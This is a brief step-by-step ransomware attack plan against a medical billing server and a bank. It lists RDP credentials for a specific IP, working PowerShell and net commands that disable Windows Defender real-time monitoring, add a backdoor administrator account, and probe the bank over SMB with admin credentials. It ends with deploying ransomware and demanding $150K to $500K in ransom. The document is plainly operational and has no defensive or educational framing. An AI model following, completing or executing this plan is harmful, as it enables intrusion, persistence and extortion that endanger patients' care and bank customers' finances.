1. RDP to 89.35.35.12 with billingadmin/Invoice2024!
2. Once in medical server:
   - Disable antivirus: `Set-MpPreference -DisableRealtimeMonitoring $true`
   - Create backdoor user: `net user Hacker P@ssw0rd123! /add && net localgroup administrators Hacker /add`
   - Test connectivity to bank: `ping 203.81.128.1`
   - Try SMB from inside: `net use \\203.81.128.1\IPC$ /user:Administrator Admin@123`
3. If bank access works:
   - Deploy ransomware to both medical AND bank servers simultaneously
   - Encrypt: Medical billing data + Bank financial data
   - Demand: $200K from medical, $300K from bank
4. If bank access fails from medical:
   - Encrypt medical data only
   - Demand $150K
   - Use funds to buy zero-day or better access